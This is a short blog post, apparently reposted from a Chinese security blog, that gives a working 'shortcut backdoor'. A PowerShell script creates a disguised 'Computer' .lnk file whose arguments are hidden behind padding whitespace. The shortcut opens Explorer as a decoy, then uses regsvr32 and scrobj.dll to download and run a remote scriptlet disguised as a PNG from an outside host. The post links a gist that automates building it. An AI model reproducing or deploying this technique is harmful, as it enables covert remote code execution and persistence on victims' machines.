Shortcut Backdoor

PS code:

$file = Get-Content “C:\Users\evi1cg\Desktop\backdoor\link\test.txt”
$WshShell = New-Object -comObject WScript.Shell
$Shortcut = $WshShell.CreateShortcut(“C:\Users\evi1cg\Desktop\backdoor\link\计算机.lnk”)
$Shortcut.TargetPath = “%SystemRoot%\system32\cmd.exe”
$Shortcut.WindowStyle = 7
$Shortcut.IconLocation = “%SystemRoot%\System32\Shell32.dll,15”
$Shortcut.Arguments = ‘                                                                                                                                                                                                                                      ‘+ $file
$Shortcut.Save()


     test.txt:

/c explorer.exe /e,::{20D04FE0-3AEA-1069-A2D8-08002B30309D} | regsvr32.exe /u /s /i:https://evi1cg.me/scripts/calc.png scrobj.dll

DEMO:  

图片[1]-Shortcut Backdoor Creation - PowerShell Script Example


写了一个自动化的脚本,地址如下:


https://gist.github.com/Ridter/a360f94d8ac9a8c30227e3812dfbb329

DEMO:

图片[2]-Shortcut Backdoor Creation - PowerShell Script Example

文章出处:Evi1cg’s blog   

原文链接:https://evi1cg.me/archives/Shortcut_Backdoor.html

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容